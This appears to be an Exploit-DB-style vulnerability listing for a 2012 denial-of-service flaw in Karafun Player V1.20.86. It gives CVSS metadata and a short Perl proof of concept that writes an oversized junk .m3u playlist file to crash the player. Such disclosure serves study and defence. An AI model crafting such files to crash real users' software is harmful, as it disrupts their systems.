header-logo
Suggest Exploit
vendor:
Karafun Player
by:
Styxosaurus
7,5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Karafun Player
Affected Version From: V1.20.86
Affected Version To: V1.20.86
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Karafun Player V1.20.86 .m3u file Denial of Service

Karafun will crash and not responding when trying to close it after runs a special crafted .m3u file.

Mitigation:

N/A
Source

Exploit-DB raw data:

# 
# Exploit Title: Karafun Player V1.20.86 .m3u file Denial of Service
# Date: 2012.6.15
# Vulnerability Discovered & Exploit by Styxosaurus
# Styxosaurus [at] gmail [dot] com
#
# Software Link: http://www.karafun.com/karaokeplayer/
# Version: V1.20.86
# Description:
#             Karafun will crash and not responding when trying to close it after
#             runs a special crafted .m3u file.

my $JUNK= "A" x 10000;
my $FILE="Karafun.m3u";
open(my $FILE, ">$FILE") or die "Cannot open $file: $!";
print $FILE $JUNK;
close($FILE);